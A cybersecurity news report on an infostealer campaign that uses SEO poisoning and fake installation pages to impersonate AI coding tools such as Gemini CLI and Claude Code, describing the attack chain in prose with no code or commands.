A new wave of cybercrime is exploiting the popularity of AI tools among software developers, with ongoing campaigns using search engine optimization (SEO) poisoning to impersonate platforms such as Gemini CLI and Claude Code. This tactic poses a direct supply chain risk as attackers target essential developer tools to compromise systems and steal sensitive information.
In early March 2026, analysts from EclecticIQ uncovered an active infostealer campaign aimed at users of these AI coding assistants. By manipulating search results, attackers present counterfeit domains that appear legitimate, leading developers to download malicious software disguised as genuine installations. This method not only spreads malware but also significantly raises the likelihood of successful attacks on enterprise networks.
The infostealer malware primarily targets Windows endpoints, using PowerShell to execute its operations entirely in memory. This stealthy approach allows the malware to harvest credentials and sensitive data from various applications without leaving a trace on the hard drive. Once collected, the data is exfiltrated in an encrypted format to a command-and-control server operated by the attackers.
Beyond credential theft, the malware provides attackers with remote code execution access. This capability enables hands-on-keyboard intrusions, allowing for interactive control within compromised environments. Such access enables the exfiltration of critical assets, including OAuth tokens, CI/CD credentials, and corporate VPN details, further jeopardizing enterprise network integrity.
The rise of these impersonation campaigns highlights a concerning trend: financially motivated actors are increasingly capitalizing on the widespread adoption of AI technologies to distribute infostealer malware. Despite ongoing law enforcement efforts, such as Operation Magnus targeting specific malware infrastructures, the deployment of infostealers against enterprises is expected to grow. The combination of low operational costs for cybercriminals and a persistent demand for stolen credentials in underground markets fuels this trend.
The infection process often begins innocently. A developer searching for the official Gemini CLI or Claude Code installation page may be misled by a fake domain that ranks above legitimate sources in search results. Once the victim clicks on the counterfeit link, they encounter a malicious page designed to mimic the authentic vendor’s installation guide, prompting them to execute a command that unwittingly installs the infostealer.
Independent threat researcher @g0njxa was among the first to identify the Gemini CLI impersonation campaign, laying the groundwork for further analysis and understanding of this malicious infrastructure. The implications of such attacks extend beyond individual developers, posing significant risks to organizations that rely on these tools for software development.
As the threat landscape evolves, enterprises must remain vigilant against these sophisticated tactics. The growing prevalence of AI platforms in development workflows creates fertile ground for cybercriminals. Enhanced security measures, increased awareness, and solid incident response strategies will be essential in mitigating the risks posed by infostealer malware and protecting valuable corporate assets. With financial gain as a primary motivator, these cyber threats are unlikely to diminish soon, underscoring the need for ongoing vigilance against emerging challenges in cybersecurity.
